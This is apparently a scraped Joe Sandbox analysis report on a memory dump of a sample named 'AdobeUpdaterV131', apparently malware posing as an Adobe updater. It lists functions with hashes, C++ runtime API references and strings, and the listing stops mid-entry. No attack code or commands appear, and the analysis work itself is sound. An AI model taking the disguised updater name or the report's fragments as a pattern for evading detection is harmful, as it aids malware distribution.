API String ID:
Opcode ID: 8c903e57d3163de47897f9bac666de0524c869772cbf535e0b6ea59eb20b9986
Instruction ID: ca23c3cf4ea656b7e52325a75ba1b6fdca77c4245b4cd4c34844fa6a492b11cb
Opcode Fuzzy Hash: 8c903e57d3163de47897f9bac666de0524c869772cbf535e0b6ea59eb20b9986
Instruction Fuzzy Hash: A661B8712202694FE788CF5EECD0476B352E38A312385C619FA81C7395C93DF926D7A5

Function 00634560 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1698be895e83f5f95fae71bab9cb0c2a1935dded74b31f29cbcc53648b6bca
Instruction ID: 078eae304f04f065d11080145d48f78085cd7e594df72e6f082bd1dda534b083
Opcode Fuzzy Hash: 4a1698be895e83f5f95fae71bab9cb0c2a1935dded74b31f29cbcc53648b6bca
Instruction Fuzzy Hash: A6519071D002099FCB04DFA8D942BEEFBB5EF49710F108269E811B7350DB75AA448BE4

Function 00703188 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a39ab25d0d454e6b1ca2585699965b33fcd08934163f1a489e990b40201b04
Instruction ID: 737d2aa1d93dfc431b731b5a0f0e6a6c7d57f07724d29045428d727c3b74b86b
Opcode Fuzzy Hash: b1a39ab25d0d454e6b1ca2585699965b33fcd08934163f1a489e990b40201b04
Instruction Fuzzy Hash: 1F518172E00119EFDF04CF98C841AEEBBF6FF88300F598559E915AB241C7389A40CB90

Function 006FFA00 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 940bb6a2a48cef5b1b51c572828d890dc9b6ccd99de5001c348d2f3fbed9ea09
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C011577720008AC3D614CB2DD8B46F7A797EFC632172D83BAD25E4B76CD623A9459A00

Function 0068A120 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0068A143
std::_Lockit::_Lockit.LIBCPMT ref: 0068A165
std::_Lockit::~_Lockit.LIBCPMT ref: 0068A185
std::_Lockit::~_Lockit.LIBCPMT ref: 0068A1AF
std::_Lockit::_Lockit.LIBCPMT ref: 0068A21D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0068A269
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0068A283
std::_Lockit::~_Lockit.LIBCPMT ref: 0068A318
std::_Facet_Register.LIBCPMT ref: 0068A325

Strings

bad locale name, xrefs: 0068A33F

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: cd2eba86e063f3e0f7bbbee3b122c13ab33305eebb314c799757b74295b61bf6
Instruction ID: 3ab1107c0338bb8582acde52b6c3b9363e59d4e2785117d195aa2820392a2ebe
Opcode Fuzzy Hash: cd2eba86e063f3e0f7bbbee3b122c13ab33305eebb314c799757b74295b61bf6
Instruction Fuzzy Hash: 4B616FB1D00248DBEB10EFE4D849BEEBBB6AF04350F184219E845A7341E779E945CB96

Function 00623770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006237E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00623835
__Getctype.LIBCPMT ref: 0062384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062386A
std::_Lockit::~_Lockit.LIBCPMT ref: 006238FF

Strings

bad locale name, xrefs: 0062391C
0:b, xrefs: 00623848

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:b$bad locale name
API String ID: 1840309910-1852626136
Opcode ID: 6250ba05992089c98f8029e6fe15a817274a1683b1b62c4714e89bb5b5ceed90
Instruction ID: e23c75da239e8cabcad234f78db69b4c75b14ae88fd73b8bfaffbcbb0bb89f1b
Opcode Fuzzy Hash: 6250ba05992089c98f8029e6fe15a817274a1683b1b62c4714e89bb5b5ceed90
Instruction Fuzzy Hash: 635151F1D00799EBDB10DFE8D84579EFBB9AF14310F144129E904AB381E779AA44CB92

Function 006FFB30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006FFB67
___except_validate_context_record.LIBVCRUNTIME ref: 006FFB6F
_ValidateLocalCookies.LIBCMT ref: 006FFBF8
__IsNonwritableInCurrentImage.LIBCMT ref: 006FFC23
_ValidateLocalCookies.LIBCMT ref: 006FFC78

Strings

csm, xrefs: 006FFC0D

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5603aa3f03cabf14044b0a336324202d44f4ef9e46fc443589f16d695d209193
Instruction ID: d9ed9ebd4a97f848b3e172923ed5be7d4a5b138913bbdc0d944242c5895e853a
Opcode Fuzzy Hash: 5603aa3f03cabf14044b0a336324202d44f4ef9e46fc443589f16d695d209193
Instruction Fuzzy Hash: D241C270A0021CDBCF10DF68C884AEE7BB6AF05324F248165ED089B392D775EA46CB91

Function 006888E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00688903
std::_Lockit::_Lockit.LIBCPMT ref: 00688926
std::_Lockit::~_Lockit.LIBCPMT ref: 00688946
std::_Facet_Register.LIBCPMT ref: 006889BB
std::_Lockit::~_Lockit.LIBCPMT ref: 006889D3
Concurrency::cancel_current_task.LIBCPMT ref: 006889EB

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 9e0309a7a1178e8331666ac25f86df0d82361141f63ff9f79f9c76c97a06cb32
Instruction ID: db19251b2dbc7bc47da5c62b6ca684c7dd9a632c258c2ed5b0525f4744256fde
Opcode Fuzzy Hash: 9e0309a7a1178e8331666ac25f86df0d82361141f63ff9f79f9c76c97a06cb32
Instruction Fuzzy Hash: 9841FF719002199FCF10EF98DC41ABABBB6FB04324F104359E919AB351EB34AE40CBD6

Function 00625DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006260F2
___std_exception_destroy.LIBVCRUNTIME ref: 0062617F
___std_exception_copy.LIBVCRUNTIME ref: 00626248

Strings

recursive_directory_iterator::operator++, xrefs: 006261CC

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 063f608a302806590a06a6472b4959067e565d40df9fff41f45a0a8f3e331fc0
Instruction ID: 52f06355fc583b60c117b61211a8feed315226bae62421bebf657757a5e63da0
Opcode Fuzzy Hash: 063f608a302806590a06a6472b4959067e565d40df9fff41f45a0a8f3e331fc0
Instruction Fuzzy Hash: 4AE112B09006049FDB28DF68E945BAEB7FAFF44300F10462DE41697B81D774AA44CFA5

Function 006284C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006286DE
___std_exception_destroy.LIBVCRUNTIME ref: 006286ED

Strings

at line , xrefs: 00628518
, column , xrefs: 00628555, 0062856B

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: a7dce8811d3e0baeae5a90aa45b42bf23fcfc26dda0c780be988d9ad86e738a0
Instruction ID: af4cfa91af0d8efb8f74963b9d5f809b765f6eed8008371a6e46af1d63773fed
Opcode Fuzzy Hash: a7dce8811d3e0baeae5a90aa45b42bf23fcfc26dda0c780be988d9ad86e738a0
Instruction Fuzzy Hash: BA6139719006189FDB08DF68EC857ADBBB7FF45310F14861CE415AB782EB74AA808B95

Function 00692750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00692BD6
___std_exception_destroy.LIBVCRUNTIME ref: 00692BEF
___std_exception_destroy.LIBVCRUNTIME ref: 00692D27
___std_exception_destroy.LIBVCRUNTIME ref: 00692D40
___std_exception_destroy.LIBVCRUNTIME ref: 00692EA6
___std_exception_destroy.LIBVCRUNTIME ref: 00692EBF
___std_exception_destroy.LIBVCRUNTIME ref: 00693709
___std_exception_destroy.LIBVCRUNTIME ref: 00693722

Strings

value, xrefs: 0069362F

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: aa854ad3cde07cdc26f81d40c0dd8b576c3f8c0f97e286816c87d70ba4d20073
Instruction ID: 62f5f3d121248c7a603ac28b10782aa8a2dd2a75e543570be556288fe4076700
Opcode Fuzzy Hash: aa854ad3cde07cdc26f81d40c0dd8b576c3f8c0f97e286816c87d70ba4d20073
Instruction Fuzzy Hash: 3F51A0B0C0025CDBDF14DBA4DD85BDEBBBAAF05304F148258E444AB782D7786A89CB65

Function 00623B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00623C0F

Strings

ios_base::badbit set, xrefs: 00623BA7, 00623BD2, 00623BF3
ios_base::failbit set, xrefs: 00623AC8, 00623BB1
ios_base::eofbit set, xrefs: 00623BB6

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: 12481fa9e76ae16e028b7130a6e3db3ae8c04ac614941b3456adf055f9a98623
Instruction ID: 1fa9b41c794cd148eb3a6f220af8350c1d31e1d9dfc12febe7f688af19684415
Opcode Fuzzy Hash: 12481fa9e76ae16e028b7130a6e3db3ae8c04ac614941b3456adf055f9a98623
Instruction Fuzzy Hash: 6F1108B2900B286BC710DE58E801B9AB3DDAF15311F04853AFA54DB241F778E954CF95

Function 00691CF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 006921D3

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
